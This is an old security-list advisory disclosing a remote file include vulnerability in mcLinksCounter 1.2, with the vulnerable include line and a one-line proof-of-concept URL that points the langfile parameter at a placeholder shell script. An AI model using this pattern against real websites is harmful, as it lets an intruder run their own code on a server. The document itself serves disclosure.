Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[Full-disclosure] OSNews

Invision Power Board D22-Shoutbox HTML Injections

Mambo Component SimpleFAQ V2.11 - Remote SQL Injection

Gurur Haber v2.0

From:	Ivan Niiiil <insp0w3r_(at)_gmail.com>
Date:	21.08.2007
Subject:	mcLinksCounter 1.2 Remote File Include by iNs

App Name : mcLinksCounter 1.2
HomePage: http://www.phpforums.net
Vuln type : Remote File Include (RFI)
Vuln Discovered by : iNs

BUG:
on file stats.php ,login.php ,detail.php :

include "$langfile";

PoC:
http://www.site.com/[path]/stats.php?langfile=[sH3lLz]?

iNs @ uNkn0wn.eu

Gr33tz t0:
uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 -
nexos - sh4m4n - Svarshik
DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy
ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - C0ol - Mic22